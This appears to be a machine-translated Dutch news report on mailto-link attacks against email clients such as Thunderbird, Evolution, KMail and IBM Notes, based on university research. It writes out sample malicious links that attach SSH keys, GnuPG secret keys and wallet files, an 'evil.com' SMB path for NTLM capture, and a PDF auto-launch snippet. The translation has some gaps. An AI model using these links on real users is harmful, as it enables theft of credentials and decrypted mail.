Onderzoekers van de Ruhr Universiteit Bochum (Duitsland) () gedrag van e-mailclients bij het verwerken van “mailto:”-koppelingen met geavanceerde parameters. Vijf van de twintig onderzochte e-mailclients waren kwetsbaar voor een aanval waarbij de vervanging van bronnen werd gemanipuleerd met behulp van de parameter ‘attach’. Nog eens zes e-mailclients waren kwetsbaar voor een PGP- en S/MIME-sleutelvervangingsaanval, en drie clients waren kwetsbaar voor een aanval om de inhoud van gecodeerde berichten te extraheren.
Links «"worden gebruikt om het openen van een e-mailclient te automatiseren om een brief te schrijven aan de geadresseerde die in de link is opgegeven. Naast het adres kunt u als onderdeel van de link aanvullende parameters opgeven, zoals het onderwerp van de brief en een sjabloon voor typische inhoud. De voorgestelde aanval manipuleert de parameter ‘attach’, waarmee u een bijlage aan het gegenereerde bericht kunt toevoegen.
Mailclients Thunderbird, GNOME Evolution (CVE-2020-11879), KDE KMail (CVE-2020-11880), IBM/HCL Notes (CVE-2020-4089) en Pegasus Mail waren kwetsbaar voor een triviale aanval waarmee u automatisch bijlagen kunt toevoegen elk lokaal bestand, gespecificeerd via een link zoals “mailto:?attach=path_to_file”. Het bestand wordt bijgevoegd zonder dat er een waarschuwing wordt weergegeven, dus zonder speciale aandacht merkt de gebruiker mogelijk niet dat de brief met een bijlage wordt verzonden.
Als u bijvoorbeeld een link als ‘mailto:[e-mail beveiligd]&subject=Titel&body=Tekst&attach=~/.gnupg/secring.gpg" kunt u privésleutels van GnuPG in de brief invoegen. U kunt ook de inhoud van crypto-wallets (~/.bitcoin/wallet.dat), SSH-sleutels (~/.ssh/id_rsa) en alle bestanden die voor de gebruiker toegankelijk zijn, verzenden. Bovendien kunt u met Thunderbird groepen bestanden bijvoegen via een masker met behulp van constructies als “attach=/tmp/*.txt”.
Naast lokale bestanden verwerken sommige e-mailclients koppelingen naar netwerkopslag en paden op de IMAP-server. Met IBM Notes kunt u met name een bestand uit een netwerkmap overbrengen bij het verwerken van koppelingen zoals “attach=\\evil.com\dummyfile”, en kunt u NTLM-authenticatieparameters onderscheppen door een koppeling te sturen naar een SMB-server die wordt beheerd door de aanvaller (het verzoek wordt verzonden met de huidige authenticatieparameters van de gebruiker).
Thunderbird verwerkt met succes verzoeken zoals “attach=imap:///fetch>UID>/INBOX>1/”, waarmee u inhoud uit mappen op de IMAP-server kunt bijvoegen. Tegelijkertijd worden berichten die zijn opgehaald uit IMAP, gecodeerd via OpenPGP en S/MIME, automatisch gedecodeerd door de e-mailclient voordat ze worden verzonden. De ontwikkelaars van Thunderbird waren dat wel over het probleem in februari en in de kwestie het probleem is al opgelost (Thunderbird-takken 52, 60 en 68 blijven kwetsbaar).
Oude versies van Thunderbird waren ook kwetsbaar voor twee andere door de onderzoekers voorgestelde aanvalsvarianten op PGP en S/MIME. In het bijzonder werden Thunderbird, evenals OutLook, PostBox, eM Client, MailMate en R2Mail2, onderworpen aan een sleutelvervangingsaanval, veroorzaakt door het feit dat de e-mailclient automatisch nieuwe certificaten importeert en installeert die worden verzonden in S/MIME-berichten, waardoor de aanvaller om vervanging van openbare sleutels te organiseren die al door de gebruiker zijn opgeslagen.
De tweede aanval, waarvoor Thunderbird, PostBox en MailMate vatbaar zijn, manipuleert de kenmerken van het mechanisme voor het automatisch opslaan van conceptberichten en maakt het mogelijk om, met behulp van mailto-parameters, de ontsleuteling van gecodeerde berichten of de toevoeging van een digitale handtekening voor willekeurige berichten te initiëren, met daaropvolgende verzending van het resultaat naar de IMAP-server van de aanvaller. Bij deze aanval wordt de cijfertekst verzonden via de parameter ‘body’ en wordt de tag ‘meta refresh’ gebruikt om een oproep naar de IMAP-server van de aanvaller te initiëren. Bijvoorbeeld: ' '
Om “mailto:”-links automatisch te verwerken zonder tussenkomst van de gebruiker, kunnen speciaal ontworpen PDF-documenten worden gebruikt. Met de actie OpenAction in PDF kunt u automatisch de mailto-handler starten bij het openen van een document:
%PDF-1.5
1 0 obj
<< /Type /Catalogus /OpenActie [2 0 R] >>
endobj
2 0 obj
<< /Type /Actie /S /URI/URI (mailto:?body=——BEGIN PGP-BERICHT——[…])>>
endobj
Bron: opennet.ru